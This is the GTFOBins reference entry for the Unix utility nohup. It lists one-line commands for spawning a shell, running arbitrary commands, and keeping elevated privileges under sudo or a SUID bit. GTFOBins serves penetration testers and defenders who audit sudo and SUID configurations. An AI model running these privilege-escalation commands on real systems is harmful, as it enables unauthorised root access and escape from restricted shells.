GTFOBins.github.io/_gtfobins/nohup.md
2020-03-15 12:18:08 +01:00

15 lines
339 B
Markdown

---
functions:
shell:
- code: nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
command:
- code: |
COMMAND='/usr/bin/id'
nohup "$COMMAND"
cat nohup.out
sudo:
- code: sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
suid:
- code: sudo nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
---